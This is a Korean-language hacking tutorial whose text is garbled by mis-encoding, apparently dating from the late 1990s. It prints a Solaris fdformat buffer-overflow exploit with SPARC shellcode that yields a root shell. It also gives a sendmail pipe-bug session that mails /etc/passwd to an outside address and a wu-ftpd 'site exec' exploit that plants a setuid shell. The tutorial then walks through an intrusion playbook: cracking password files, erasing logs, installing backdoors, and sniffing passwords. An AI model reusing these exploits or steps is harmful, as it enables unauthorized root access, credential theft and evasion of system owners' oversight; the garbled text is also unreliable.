    ¹öÆÛ ¿À¹öÇ÷οì´Â 1988³â Àü¼¼°è¸¦ ¶°µé¼®ÇÏ°Ô ¸¸µé¾ú´ø Morris Worm »ç°Ç¿¡¼­ÀÇ finger daemonÀ» ÀÌ¿ëÇÑ °ø°ÝÀÌ ½ÃÃʶó°í ¸»ÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ °ú°Å ÀÌ¿¡ ´ëÇÑ ±â¼úÀû Áö½ÄÀÌ ºÎÁ·Çß´øÅͶó Àß ¾Ë·ÁÁöÁö ¾Ê¾ÒÀ¸³ª 1997³â Phrack ÀâÁö 49È£¿¡ ½Ç¸° AlephÀÇ ¡°Smashing the Stack for Fun and Profit¡± À̶ó´Â ±â»ç¿¡¼­ ÀÌ ¹öÆÛ ¿À¹öÇ÷ο쿡 ´ëÇÑ ÀÚ¼¼ÇÑ ¿ø¸®¿Í Á¦ÀÛ ¹æ¹ýÀÌ ¼Ò°³µÇ¸é¼­ Áö±Ý ±îÁöµµ ¸¹Àº ¾çÀÇ ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ø°Ý¹æ¹ýÀÌ »ý°Ü³ª°í ÀÖ´Ù.

    ¿ø¸®¸¦ °£´ÜÈ÷ »ìÆ캸ÀÚ¸é :
    ¸Þ¸ð¸®ÀÇ ½ºÅÿµ¿ªÀ» ³ÑÃÄÈ帣°Ô Çؼ­ ¸®ÅϵǴ ÁÖ¼ÒÁö¸¦ º¯°æÇÏ¿© ¿øÇÏ´Â ÀÓÀÇÀÇ ¸í·É¾î¸¦ ½ÇÇà½ÃŲ´Ù´Â ±×·± ¸»¾¸.. ( »ç½Ç ¿ø¹®À» ÀÚ¼¼ÇÏ°Ô À̾߱âÇÏÀÚ¸é ¿©·¯ºÐµéÀÌ ÀÌÇظ¦ ¸øÇÒ·±Áöµµ ¸ð¸¥´Ù. ÀÌ Á¤µµ¸¸ ¾Ë°í Àֱ⸦... - ±×·¡µµ ³»°¡ ÇÑ ¸»ÀÌ ÇÙ½ÉÀÌ´Ù! ÇÙ½É!!)

    À̹ø¿£ ¹öÆÛ ¿À¹öÇ÷ο츦 ÀÏÀ¸Å°´Â ÇÁ·Î±×·¥À» Çϳª »ìÆ캼±î?
    fdformatÆÄÀÏÀº µð½ºÅ©³ª  PCMCIA ¸Þ¸ð¸® Ä«µå¸¦ Æ÷¸ä½Ãų¶§ »ç¿ëÇÏ´Â À¯Æ¿¸®Æ¼ÀÌ´Ù.
    Àμö äũ¸¦ ÇÏÁö ¾Ê¾Æ¼­ »ý±ä ¹ö±×ÀÌ´Ù.

    /*
    Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on 2.5.1
    */ # ¼Ö¶ó¸®½º 2.4 ~ 2.5.1 ±îÁöÀÇ °ø°ÝÄÚµå

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 364
    #define EXTRA 400
    #define STACK_OFFSET 704
    #define SPARC_NOP 0xa61cc013

    # ÀÌ ºÎºÐÀÌ ¹Ù·Î root shellÀ» ¾ò¾î³»´Âµ¥ ÇÙ½ÉÀÎ ½© ÄÚµå
    # ºÎºÐÀÌ´Ù.
    u_char sparc_shellcode[] =
    ¡°¡¬x2d¡¬x0b¡¬xd8¡¬x9a¡¬xac¡¬x15¡¬xa1¡¬x6e¡¬x2f¡¬x0b¡¬xda¡¬xdc¡¬xae¡¬x15¡¬xe3¡¬x68¡± ............. # ½© ÄÚµå µÎ ÁÙ »èÁ¦
    ...................
    ¡°¡¬x82¡¬x10¡¬x20¡¬x3b¡¬x91¡¬xd0¡¬x20¡¬x08¡¬x90¡¬x1b¡¬xc0¡¬x0f¡¬x82¡¬x10¡¬x20¡¬x01¡±
    ¡°¡¬x91¡¬xd0¡¬x20¡¬x08¡±;

    u_long get_sp(void)
    {
    __asm__(¡°mov %sp,%i0 ¡¬n¡±);
    }

    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

    printf(¡°Jumping to address 0x%lx B[%d] E[%d] SO[%d]¡¬n¡±,
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    execl(¡°/bin/fdformat¡±, ¡°fdformat¡±, & buf[1],(char *) 0);
    perror(¡°execl failed¡±);
    } # Àß ¸ð¸£°Ú´Ù¸é À¯´Ð½º ÇÁ·Î±×·¡¹ÖÀ» ¹è¿ìÀÚ.. (³ªµÎ.. ³ªµÎ.. --;)

    °£´ÜÈ÷ ÄÄÆÄÀÏ ½ÃÅ°°í ½ÇÇàÀ» ½ÃÅ°ÀÚ¸é

    % gcc -o fdformat fdformat.c
    % ./fdformat
    .....
    ...
    # whoami
    root

    ÆÐÄ¡°¡ µÇ¾îÀÖ´Ù¸é ´ç¿¬È÷ ¾È ¸ÔÈú °ÍÀÌ°í....

    ÀÌ Á¤µµ·Î  Local attack¿¡ °üÇÑ À̾߱⸦ ¸¶¹«¸® ÁöÀ»±î ÇÑ´Ù. ´ëÃæ.. ¾Æ~ ÀÌ·¸°Ô Çϴ±¸³ª.. ÀÌ·± ¹æ½ÄÀ¸·Î °ø°ÝÇϴ±¸³ª... ÀÌ Á¤µµ¸¸ ¾Ë¾ÆµÎ°í ³Ñ¾î°¡ÀÚ.

 

3. Remote attack

    À§¿¡¼­ ¸®¸ðÆ® °ø°Ý¿¡ °üÇÏ¿© ´ëÃæ µé¾úÀ» °ÍÀÌ´Ù. ¹Ù·Î °ø°Ý¿¡ µé¾î°¡ÀÚ~ µ¹Áø!

    - ¼¾µå¸ÞÀÏ ¹ö±×
    ¸®¸ðÆ® °ø°ÝÀÇ ´ëÇ¥ÀûÀÎ ÁÖÀÚ´Â ¹Ù·Î ÀÌ Sendmail ÀÏ °ÍÀÌ´Ù. ÇÁ·Î±×·¥ÀÇ Å©±â°¡ ´Ù¸¥°Í º¸´Ù ¹«Ã´ Å©±â ¶§¹®¿¡ ±× ¸¸Å­ ¹ö±×°¡  ¸¹ÀÌ Á¸ÀçÇÑ´Ù. (local bugµµ ¹«Ã´ ¸¹´Ù...)

    ÀÌ ¹æ¹ýÀº ¸î ³â Àü SunOs 4.1.x´ëÀÇ sendmail ¹öÀü 4.1¿¡¼­ À¯ÇàÇß´ø ¹ö±×ÀÌ´Ù. ±×·³ ¿ª½Ã³ª ÂùÂùÈ÷ »ìÆ캸µµ·Ï ÇÏÀÚ.

    % telnet salsari.org 25 # smtp Æ÷Æ®·Î ÅÚ³ÝÇØ µé¾î°£´Ù.
    Trying 255.255.255.255 ...
    Connetcted to salsari.org. # Á¢¼ÓµÇ¾ú´Ù.
    Escape character is ¡®^]¡¯ # ¸¸¾à ºüÁ®³ª°¡°í ½Í´Ù¸é Ctrl + ] ´­·¯¶ó.

    220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST
    # ¼¾µå¸ÞÀÏ ¹öÁ¯È®ÀÎ

    mail from:¡±|/bin/mail salsari@hotmail.com < /etc/passwd¡±
    # salsari@hotmail·Î /etc/passwdÆÄÀÏÀ» º¸³»¶ó´Â ¸í·É - ÆÄÀÌÇÁ(|) ¹ö±× ÀÌ¿ë
    # from ÀԷ¿¡¼­ ÆÄÀÌÇÁ ÀÌÈÄ ¸í·É¾î°¡ ½ÇÇà°¡´ÉÇÏ°Ô µÇ¾îÀÖ´Ù.

    250 ¡°|/bin/mail salsari@hotmail.com < /etc/passwd¡±... Sender ok # µ¥¸óÀº ÀÔ·Â ¹Þ¾Ò´Ù.

    rcpt to : root # ¹Þ´Â »ç¶÷  root
    250 root... Recipient ok # µ¥¸óÀÌ ¸»ÇÏ±æ ¡°¾Ë°Ú¾î¡±
    data # º¸³¾ ³»¿ë ÀÛ¼º
    354 Enter mail, end with ¡°.¡± on a line by inself
    babo... # ¹Ùº¸... -_- (¾Æ¹«³»¿ëÀ̳ª Áý¾î ³Ö´Â´Ù.)
    # . À» ÂïÀ¸¸é ³»¿ë ÀÛ¼ºÀ» ¸¶Ä£´Ù.
    250 Mail accepted
    quit # ºüÁ®³ª°¡ÀÚ.
    221 salsari.org delivering mail
    Connection closed by foreign host.

    # Á¢¼ÓÀº ²÷¾îÁö°í ÀÌÁ¦ Æнº¿öµå ÆÄÀϸ¸ ÀÚ½ÅÀÇ E-mail·Î ¿À±â¸¦ ±â´Ù¸®¸é µÈ´Ù.

    ÀÌ·¸°Ô ¾òÀº Æнº¿öµå ÆÄÀÏÀ» Å©·¢ÇØ (Àç¼ö ÁÁÀ¸¸é root Æнº¿öµåµµ ¾òÀ» ¼ö ÀÖ´Ù.) local·Î Á¢¼ÓÇÑµÚ localÀÇ ¼ö¸¹Àº ¹ö±×¸¦ ÀÌ¿ëÇÏ¿© root¸¦ ¾òÀ¸¸é µÇ´Â °ÍÀÌ´Ù.

    ±×·³ Á¶±Ý ÃÖ±ÙÀÇ wu-ftp 2.4 ¹öÀüÀÇ ¹ö±×¸¦ »ìÆ캸ÀÚ.
    ÀÌ ¹ö±×´Â site exec ¸í·É¾î¸¦ ¼öÇàÇÒ ¼ö À־ ½±°Ô root shellÀ» ¾òÀ» ¼ö ÀÖ´Ù.  

    COMMAND
    wu.ftpd(8)

    SYSTEMS AFFECTED
    Sites running wuarchive ftpd versions prior to 2.3 or running
    ¡°wrl¡± ftpd version ??

    PROBLEM: # site exec ¸í·É¾î´Â ftp¿¡¼­ ½© ¸í·É¾î¸¦ ½ÇÇà½Ãų¼ö ÀÖ´Ù.

    Compile program : # °ø°Ý ¼Ò½º - ¸¸µé°í ³ª¼­ ÄÄÆÄÀÏ ½ÃÅ°ÀÚ.
    # ÄÄÆÄÀÏ : cc -o ftpbug ftpbug.c
    #include < stdio.h>
    #include < stdlib.h>
    #include < unistd.h>

    main()
    {
    seteuid (0);
    system (¡°cp /bin/sh /tmp/.sh¡±);
    system (¡°chmod 6777 /tmp/.sh¡±);
    }

    Login to the system : # ÄÄÆÄÀÏ ½ÃÄ×À¸¸é ftp·Î Á¢¼Ó

    220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
    Name (exploitablesys:root): goodaccount # ÀÚ½ÅÀÇ user name ÀÔ·Â
    331 Password required for goodaccount.
    Password: (password) # password ÀÔ·Â
    230 User goodaccount logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.

    See if system is exploitable : # ftp bug°¡ Á¸ÀçÇÏ´ÂÁö testÇÑ´Ù.

    ftp> quote ¡°site exec bash -c id¡± # ÀÌ ¸í·É¾î¸¦ ÀÔ·ÂÇßÀ»¶§...
    200-bash -c id # id ¸í·É¾î¸¦ ½ÇÇà
    200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
    200 (end of ¡®bash -c id¡¯) # °á°ú°¡ ÀÌ·¸°Ô ³ªÅ¸³­´Ù¸é °ø°Ý´ë»óÀÌ´Ù.

    Exploit system : # test°¡ ¼º°øÀ̶ó¸é ½ÇÁ¦ÀûÀ¸·Î °ø°ÝÇÏÀÚ.

    # ¸¸µé¾î µÎ¾ú´ø °ø°ÝÄڵ带 ½ÇÇà½ÃÅ°¸é root ±ÇÇÑÀ» ¾òÀ»
    # ¼ö ÀÖ´Â .sh ÆÄÀÏÀÌ  /tmp/.sh ¿¡ »ý¼ºµÈ´Ù.
    ftp> quote ¡°site exec bash -c /yer/home/dir/ftpbug¡±
    200-bash -c /yer/home/dir/ftpbug
    200 (end of ¡®bash -c /yer/home/dir/ftpbug¡¯)
    ftp> quit # ½ÇÇà ½ÃÄ×À¸´Ï ÀÌÁ¦ ºüÁ®³ª°¡ÀÚ.
    221 Goodbye. # ±×¸®°í /tmp/.sh½ÇÇà!!!! ¿©·¯ºÐµéÀº ÀÌÁ¦ºÎÅÍ root´Ù!!!

    remote attackÀÇ µÎ ¿¹¸¦ »ìÆ캸¾ÒÁö¸¸ µÎ °¡Áö ´Ù À߸øµÈ ¼³Á¤À¸·Î ¸¸µé¾îÁø holeÀÌ´Ù. ÀÌ·±°Íµé ¸»°í daemonÀÌ °¡Áö°í ÀÖ´Â ¹ö±×¿¡ ÀÇÇÑ buffer overflow°¡ ÀÖ´Ù. ´ëÇ¥ÀûÀÎ °ÍÀÌ ÃÖ±Ù¿¡ ³ª¿Â wu-ftp 2.4.2 ¹öÀü´ëÀÇ remote buffer overflowÀÌ´Ù.

     

4. ÃÖ±Ù ¹ö±×µé

    - linux
    Linux_INN - ·¹µåÇò ¸®´ª½º 6.0 INN Ãë¾àÁ¡ ¹× ´ëÃ¥
    Linux_pop2d - pop2d Ãë¾àÁ¡ ¹× ´ëÃ¥
    Linux super buffer overflow - super ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

    - sun / solaris
    SUN-automountd - SUN automountd Ãë¾àÁ¡
    SUN-passwd - Sun passwd ¼­ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥
    Sun man/catman - Sun man/catman Ãë¾àÁ¡ ¹× ´ëÃ¥
    Sun CDE - Sun CDE Ãë¾àÁ¡ ¹× ´ëÃ¥
    SUN sdtcm_convert - sdtcm_convert Ãë¾àÁ¡ ¹× ´ëÃ¥
    Solaris_libc - ¼Ö¶ó¸®½º libc Ãë¾àÁ¡ ¹× ´ëÃ¥

    - HP/UX
    HP sendmail DOS - HP Sendmail DOS Ãë¾àÁ¡ ¹× ´ëÃ¥
    HP_ftp - HP-UX ftp Ãë¾àÁ¡ ¹× ´ëÃ¥
    HP CDE ttsession - HP CDE ttsession Ãë¾àÁ¡ ¹× ´ëÃ¥

    - AIX
    AIX Vulnerability in ptrace() system call - AIX ptrace() ½Ã½ºÅÛ ÄÝÀÇ ¼­ºñ½º°ÅºÎ°ø°Ý Ãë¾àÁ¡
    AIX named-xfer security problem - AIX named-xfer º¸¾È Ãë¾àÁ¡ ¹× ´ëÃ¥
    AIX pdnsd buffer overflow - IBM AIX pdnsd ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

    - IRIX
    IRIX X server path - IRIX X server path Ãë¾àÁ¡ ¹× ´ëÃ¥
    IRIX_midikeys - IRIX midikeys Ãë¾àÁ¡ ¹× ´ëÃ¥

    - DOS
    tcp-denial-of-service - TCP/IP ¼­ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥
    Using the Domain Name System DoS attack - µµ¸ÞÀγ×ÀÓ ½Ã½ºÅÛÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ(DoS)°ø°Ý

    - trojan / virus
    Trojan Tcp Wrapper - Æ®·ÎÀ̸ñ¸¶ ¹öÀüÀÇ TCP Wrapper
    Melissa-Macro-Virus - Melissa ¸ÅÅ©·Î ¹ÙÀÌ·¯½º
    CIH-Virus - CIH ¹ÙÀÌ·¯½º

    - FTP
    FTP-buffer overflows - FTP Buffer Overflows Ãë¾àÁ¡°ú ´ëÃ¥
    Remote buffer overflow in ftpd daemon.
    ProFTPD 1.2.0pre1 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
    wu-ftpd 2.4.2(beta 18)±îÁöÀÇ ¸ðµç ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
    wu-ftpd VR series - 2.4.2(beta 18) VR10 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
    BeroFTPD 1.2.0 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
    NcFTPd 2.3.4 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
    Crashing FTP Serv-U 2.5 - FTP Serv-U 2.5 Ãë¾àÁ¡ ¹× ´ëÃ¥

    - ETC
    lsof buffer boverflow - lsof ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
    umapfs - umapfs Ãë¾àÁ¡ ¹× ´ëÃ¥
    cmsd-Buffer Overflow - Calendar Manager ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
    Accelerated-X Overflow - Accelerated-X X¼­¹ö Ãë¾àÁ¡ ¹× ´ëÃ¥
    Tiger vulnerability - Tiger Ãë¾àÁ¡ ¹× ´ëÃ¥
    amd buffer overflow vulnerability - amd ¿ø°Ý ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

     

5. ÇØÄ¿µéÀÇ ÇØÅ· ¹æ¹ý·Ð

    ¿©·¯ºÐµéÀº À§¿¡¼­ Local host ¿¡¼­ root¸¦ ¾ò´Â ¹æ¹ý°ú Remote host¿¡¼­ root¸¦ ÃëÇÏ´Â ¹æ¹ýÀ» º¸¾ÒÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸ ÀÌ·± ¹æ¹ýµéÀº Áö±ØÈ÷ ±Ø´ÜÀûÀÎ ¹æ¹ýÀ̶ó°í º¼ ¼ö ÀÖ´Ù. ±×·³ ÇØÄ¿µéÀÌ ÇϳªÀÇ ½Ã½ºÅÛÀ» ÇØÅ·Çϱâ À§Çؼ­ ¾î¶² ¼ø¼­¸¦ °ÅÃļ­ ¾î¶»°Ô ÇØÅ·ÇÏ¿© root¸¦ ÃëÇÏ´ÂÁö ¾Ë¾Æº¼ ÇÊ¿ä°¡ ÀÖ´Ù.

    5.1 Á¤º¸¼öÁý

    ¿ì¼± ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀ» A, °ø°Ý ¸ñÇ¥°¡ B¶ó°í ÇÑ´Ù¸é B¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇØ¾ß ÇÒ °ÍÀÌ´Ù. ¹°·Ð B¿¡ ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â °èÁ¤À̳ª ȤÀº ¾Æ´Â °èÁ¤ÀÌ ÀÖ´Ù¸é ÀÏÀº ½¬¿öÁö°ÚÁö¸¸ ±×·¸Áö ¾Ê´Ù°í ÇßÀ» °æ¿ì ¾î¶»°Ô Çؼ­µç B¿¡ ħÅõÇؾ߸¸ ÇÑ´Ù. ( ¿Ö³Ä¸é remote bug¿¡ ºñÇØ local bug°¡ ¹«±Ã¹«Áø Çϰŵ¢... remote bug¸¦ ÀÌ¿ëÇؼ­ root°¡ µÇ¸é ´õ ÁÁ°í... )
    ±×·²·Á¸é finger³ª smtp, rusers, rpcinfo µî°ú °°Àº °ÍÀ¸·Î »ç¿ëÇÒ ¸¸ÇÑ °èÁ¤Àº ¾ø´ÂÁö ȤÀº remote bug´Â °¡Áö°í ÀÖÁö ¾ÊÀ»±î¸¦ »ìÆ캸°Ô µÈ´Ù. bugµéÀ» ¿©·¯ºÐµé¿¡°Ô ÀÚµ¿À¸·Î ¾Ë·ÁÁÖ´Â remote bug scan ÇÁ·Î±×·¥µéÀÌ Àֱ⵵ ÇÏ´Ù. sscanÀ̳ª mscan µîÀÌ ±× ´ëÇ¥ÀûÀÎ ¿¹ ÀÌ´Ù. ±×¸®°í °ü¸®ÀÚÀÇ ÆÐÅϵµ ¾Ë¾Æ¾ß ÇÑ´Ù. ¾î¶² ½Ã°£´ë¿¡ Á¢¼ÓÀ» ÇÏ¿© ÀÛ¾÷À» Çϴ°¡? °ü¸®ÀÚ°¡ root°¡ ¾Æ´Ñ ¾î¶² ·Î±×Àθí(°èÁ¤)À» »ç¿ëÇϴ°¡? ¶Ç rootÀÇ idle timeÀÌ ¾î´ÀÁ¤µµÀΰ¡? (root°¡ idle timeÀÌ ¸¹À» ¼ö·Ï °ÔÀ¸¸¥ °ü¸®ÀÚ°¡ ½Ã½ºÅÛÀ» °ü¸®ÇÑ´Ù°í º¼ ¼ö ÀÖ´Ù.)
    ½Ã½ºÅÛ¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇßÀ¸¸é ±¸Ã¼ÀûÀÎ °èȹÀ» ¼ö¸³ÇØ¾ß ÇÑ´Ù.

    5.2 °èȹ ¼ö¸³
    ¾î¶² ¹æ¹ýÀ¸·Î °¥ °ÍÀΰ¡?

    - B¿¡ root¸¦ ȹµæ ÇÒ ¼ö ÀÖ´Â remote bug°¡ ÀÖ¾î ¹Ù·Î root°¡ µÉ °ÍÀΰ¡?
    - A¿¡¼­ root ±ÇÇÑÀ» µý ÈÄ root ±ÇÇÑÀ» ÀÌ¿ëÇÏ¿© BÀÇ °èÁ¤À» ¾òÀ» °ÍÀΰ¡?
    - B¿¡ Ãë¾àÇÑ °èÁ¤ÀÌ ÀÖ¾î ±×°÷À¸·Î ħÅõÇÒ °ÍÀΰ¡?
    - cgi bug µîÀ» ÀÌ¿ëÇؼ­ ¾òÀº passwd ÆÄÀÏÀ» Å©·¢ ÇÒ °ÍÀΰ¡?

    root ·Î ¹Ù·Î ħÅõÇß´Ù¸é
    - log Á¤º¸¸¦ ¾ø¾Ö°í backdoor¸¦ ¼³Ä¡ÇÒ °Í¿¡ °ü·ÃµÈ »çÇ×
       user ·Î ħÅõÇß´Ù¸é
    - BÀÇ local bug¸¦ ã´Â´Ù. ±×¸®°í root±ÇÇÑÀ» ¾ò´Â´Ù.
    - log Á¤º¸¸¦ ¾ø¾Ö°í ½±°Ô µé¾î ¿Ã ¼ö ÀÖµµ·Ï backdoor¸¦ ¼³Ä¡ÇÑ´Ù.

    ÀÚ, °èȹÀ» ¼ö¸³ÇÏ¿© Â÷·Ê´ë·Î Á¤¸®Çߴ°¡?

    5.3 Remote attack
    Remote attackÀ» ½ÇÇàÇÑ´Ù. ±×°ÍÀÌ root¸¦ ¾òµç ÀÏ¹Ý user ±ÇÇÑÀ» ¾òµç ¿ì¼± B¿¡ ħÅõÇÏÀÚ!

    5.4 Local attack
    local bug·Î root¸¦ µû³»ÀÚ.

    5.5 ÈçÀû ¾ø¾Ö±â
    ħÅõ¿¡ ¼º°øÇß´Ù¸é ±×¸®°í root ±ÇÇÑÀ» ¾ò¾ú´Ù¸é ÈçÀûÀ» ³²°åÀ» °ÍÀÌ´Ù. last ¸í·ÉÀ̳ª /var/adm(log)/messages, /var/adm/utmp /var/adm/wtmp µî.. »ìÆ캸¸é ÈçÀûµéÀÌ ³²¾Æ ÀÖÀ» °ÍÀε¥ ÀÌ ÈçÀûµéÀ» Áãµµ »õµµ ¸ð¸£°Ô ¾Æ¹«·± º¯È­¾øÀÌ »èÁ¦Çؾ߸¸ ÇÑ´Ù.

    5.6 backdoor ¼³Ä¡
    ¿©·¯ºÐµéÀÌ ´Ù½Ã B ½Ã½ºÅÛ¿¡ Á¢¼ÓÇϱâ À§Çؼ­ ¶Ç ´Ù½Ã ÇØÅ·À» Çؾ߸¸ ÇÒ±î? ¾Æ´Ï´Ù. backdoor ¶ó´Â °ÍÀÌ ÀÖÁö ¾ÊÀº°¡? backdoor(µÞ¹®)´Â ½Ã½ºÅÛ ÇØÅ· ÈÄ ´Ù½Ã ±× ½Ã½ºÅÛ¿¡ µé¾î ¿Ã ¶§ ½±°Ô µé¾î¿À±â À§ÇÑ ÇϳªÀÇ ¹æ¹ýÀÌ´Ù. ¹éµµ¾îÀÇ Á¾·ù´Â »ó´çÈ÷ ¸¹´Ù. ÀÚ¼¼ÇÑ °ÍÀº 6.4.5 ¿¡¼­ »ìÆ캸ÀÚ.

    5.7 ±×¸®°í Áñ±â±â
    ¸¶À½²¯ ¶Ù¾î ³îÀÚ. °ü¸®ÀÚµéÀ» °ü¸®Çغ¸°í ³» ½Ã½ºÅÛó·³ °¡Áö°í ³îÀÚ. ´Ù¸¸ ½Ã½ºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷´Â ÇàÀ§´Â ÇÏÁö ¸»ÀÚ. ±×°ÍÀº Å©·¡Ä¿µéÀÇ ÇàÀ§ÀÌ´Ù. Á¶¿ëÈ÷ Á¶¿ëÈ÷ ¾Æ¹«µµ ¸ð¸£°Ô °¡Áö°í ³îÀÚ. ÀØÁö ¾Ê±â¸¦...

     

6. ±×¿Ü ÇØÅ· ±â¼úµé.

    6.1 packet sniffing

    sniffer¶õ ³×Æ®¿÷ »ó¿¡ µ¹¾Æ´Ù´Ï´Â ÆÐŶÀ» Àâ´Â ÇÁ·Î±×·¥ÀÌ´Ù. ¿ø·¡ ¿ëµµ´Â ³×Æ®¿÷ µð¹ö±ë ÀÛ¾÷À̾úÀ¸³ª, º¸¾ÈÅøÀÌ °ð ÇØÅ·ÅøÀ̵íÀÌ °ð ¹Ù·Î ÇØÄ¿µéÀÇ »ç¶ûÀ» ¹Þ¾Ò´Ù. ÀÌ´õ³ÝÀÇ °æ¿ì È£½ºÆ® A¿¡¼­ È£½ºÆ® B·Î ÆÐŶÀ» º¸³¾¶§´Â broadcast¹æ½ÄÀ¸·Î ÆÐŶÀ» ÀÌ´õ³Ý Àüü¿¡´Ù°¡ »Ñ¸®°Ô µÈ´Ù. ±×·³ ÁöÁ¤µÈ ÁÖ¼Ò¸¦ °¡Áø È£½ºÆ®´Â ±× ÆÐŶÀ» Àâ°í ±× ¿Ü È£½ºÆ®´Â Àڽſ¡°Ô ¿À´Â ÆÐŶÀÌ ¾Æ´Ï¹Ç·Î ¹«½ÃÇÏ°Ô µÈ´Ù. ±×·³ ´ëÃæ ÀÌÇØ°¡ °¡¸®¶ó º»´Ù. ±× ¹«½ÃµÇ´Â ÆÐŶÀ» ¹«½ÃÇÏÁö ¾Ê°í ó¸®Çعö¸®¸é ¾î¶³±î? ¿©±â¼­ sniffingÀÌ Åº»ýÇÏ°Ô µÇ¾ú´Ù.

     

      -- TCP/IP LOG -- TM: Tue Feb 15 17:04:55 --
      PATH: salsari.org(1953) => jungmin.org(ftp)
      STAT: Sun Apr 14 18:09:23, 14 pkts, 49 bytes [TH_FIN]
      DATA: USER salsari
      :
      : PASS jungminlove
      :
      : CWD backup
      :
      : NLST
      :
      : QUIT
      : --

     

    6.2 Spoofing

    - IP spoofing
    TCP/IP ÇÁ·ÎÅäÄÝÀÇ °áÇÔÀ» ÀÌ¿ëÇØ ½Å·Ú°ü°è¿¡ Àִ ȣ½ºÆ®ÀÇ ip·Î À§ÀåÇØ Ä§ÅõÇÏ´Â °ø°Ý ¹æ¹ýÀ» ip spoofingÀ̶ó ÇÑ´Ù. ÀÌ °áÇÔ¿¡ ´ëÇؼ­´Â 1985³â¿¡ ·Î¹öÆ® ¸ð¸®½ºÀÇ ³í¹® ¡°A Weakness in the 4.2 BSD UNIX TCP/IP Software¡±¿¡ ¾ð±ÞµÇ¾ú°í 1995³â À¯¸íÇÑ ÇØÄ¿ Äɺó¹ÌÆ®´ÐÀÌ ÀÌ ÀÌ·ÐÀ» ½ÇÁ¦È­ÇÏ¿© »ç¿ëÇÏ¿´´Ù.

    > ¿©±â¼­ Àá±ñ!!
    R commands(rlogin. rsh, rcp)
    ÀÌµé ¸í·É¾î´Â ´ë»ó ½Ã½ºÅÛÀÇ $HOME/.rhostsÀÇ ³»¿ëÀ» ÂüÁ¶ÇÏ¿© ¾Æ¹« ÀÎÁõ¾øÀÌ È¨µð·ºÅ丮¿¡ Á¢±ÙÇÏ´Â ¸í·É¾îÀÌ´Ù. ¹Ù·Î ½Å·Ú°ü°èÀÇ ´ë¸í»ç¶ó°í³ª ÇÒ±î?

    - DNS spoofing
    DNS ¼­¹ö¸¦ DOS °ø°ÝÀ¸·Î ¹«·ÂÈ­½ÃÅ°°í È£½ºÆ® ³×ÀÓÀ» ±âÁØÀ¸·Î ÀÎÁõ°úÁ¤À» °ÅÄ¡´Â Ÿ°Ù È£½ºÆ®·Î ÇÏ¿©±Ý ÇØÄ¿ÀÇ È£½ºÆ®¸¦ ¹Ï°Ô²û DNS Á¤º¸¸¦ º¸³»¾î rlogin, rsh °ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ´Â °ø°Ý¹ý.

    - Web spoofing
    Web »ó¿¡¼­ °ø°Ý ´ë»ó Web »çÀÌƮó·³ Èä³»³»¾î Á¤º¸¸¦ »©³»°¡´Â ¹æ½Ä

    6.3 IP hijacking
    TCP ÇÁ·ÎÅäÄÝÀÇ Ãë¾à¼ºÀÇ ÇϳªÀÎ ¸®´ÙÀÌ·º¼ÇÀ» ÀÌ¿ëÇØ ½Ö¹æÇâ È£½ºÆ® »çÀÌ¿¡ Connect°¡ µÇ¾î ÀÖ´Â »óŸ¦ »ìÇÇ°í ÀÖ´Ù°¡ Áß°£¿¡ ³¢¾îµå´Â ¹æ½ÄÀ» hijacking À̶óÇÑ´Ù.  SKEY¿Í °°Àº ÀÏȸ¿ë Æнº¿öµå³ª Kerberos¿Í °°Àº Ÿ°Ù ±â¹Ý ÀÎÁõ ½Ã½ºÅÛ¿¡ ÀÇÇØ Á¦°øµÇ´Â º¸È£ ¸ÞÄ¿´ÏÁòÀ» ¿ìȸÇÏ¿© ħÅõÇÒ ¼ö ÀÖ´Ù.

    6.4 DOS
